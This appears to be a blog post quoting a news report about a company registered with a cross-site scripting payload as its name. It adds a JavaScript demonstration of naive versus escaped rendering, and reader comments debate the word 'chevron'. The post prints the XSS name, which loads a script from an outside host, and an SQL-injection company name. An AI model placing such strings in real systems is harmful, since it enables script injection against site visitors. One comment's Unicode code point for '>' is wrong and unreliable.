The return of Bobby Tables, LLC

The company is now legally known as "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD".

He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.

The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]

He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.

A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."

I love that they called it a "chevron".

Chevron 1 was, apparently, not encoded.

Previously.
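The failure the quoted article describes, as an added example that is not part of the original post or the article: a hypothetical page template (`page`) that drops a company name into an attribute value and into element text, rendered once without and once with HTML encoding, then checked by a simplified tag scanner (`audit`). The name is constructed to have the same shape as the one quoted above, with a placeholder host.

```javascript
// Constructed company name, shaped like the one quoted above; placeholder host.
const NAME = '"><SCRIPT SRC=HTTPS://EXAMPLE.INVALID> LTD';

const ENC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const DEC = Object.fromEntries(Object.entries(ENC).map(([k, v]) => [v, k]));

// Encode every character that can close an attribute value or open a tag.
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => ENC[c]);
// Reverse of escapeHtml: what a browser shows after decoding those entities.
const unescapeHtml = (s) => s.replace(/&(?:amp|lt|gt|quot|#39);/g, (e) => DEC[e]);

// Hypothetical page of a site republishing the register: the name lands in
// an attribute value and in element text.
const page = (n) => `<input name="company" value="${n}"><h1>${n}</h1>`;
const renderNaive = (name) => page(name);               // vulnerable
const renderEscaped = (name) => page(escapeHtml(name)); // hardened

// Simplified start-tag scanner (not a full HTML5 parser): a quoted attribute
// value may contain '>', otherwise the tag ends at the first '>'.
function audit(html) {
  const tagRe = /<([a-z][a-z0-9]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  const tags = [];
  let inputValue = null;
  for (const m of html.matchAll(tagRe)) {
    const tag = m[1].toLowerCase();
    tags.push(tag);
    const v = /\svalue="([^"]*)"/i.exec(m[2]);
    if (tag === 'input' && v) inputValue = unescapeHtml(v[1]);
  }
  return { tags, inputValue, injectedScript: tags.includes('script') };
}

// Naive: the field value is empty and script start tags appear in the markup.
// Escaped: the field holds the full name and no extra tags exist.
for (const [label, render] of [['naive', renderNaive], ['escaped', renderEscaped]]) {
  console.log(label, JSON.stringify(audit(render(NAME))));
}
```

In the naive rendering the leading `">` closes the `value` attribute and the `<input>` tag, which is why the name reads as blank; in the escaped rendering the same bytes round-trip as text.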


4 Responses:

  1. Flotsam says:

    I love that they called it a "chevron"

    It's the Guardian. It took most of their sub-eds and journalists 20 years to learn the difference between the Net and the Web.

    • tfb says:

      What is the right name for it? I call it 'right angle bracket' I think. 'Greater-than-sign' is identical in ASCII but semantically different.

      (I'm not suggesting 'chevron' is right, just that I've realised I don't know what really is right.)

  2. Kyzer says:

    "Chevron" describes a V-shaped symbol. I think the term might be used in typography, e.g. "a right angle bracket is a right pointing chevron", but I've only ever heard them called "angle brackets" in computing.

    Angle brackets in maths are ⟨⟩ (U+2329 / U+232A), but they're not on normal computer keyboards, so the similarly shaped <> (U+003C / U+003D) became the de-facto angle brackets in programming and markup languages.

  3. mattl says:

    Yeah, the British call them chevrons for some reason. But we have a song about it.

    https://halfmanhalfbiscuit.uk/four-lads-who-shook-the-wirral-1998/keeping-chevrons/
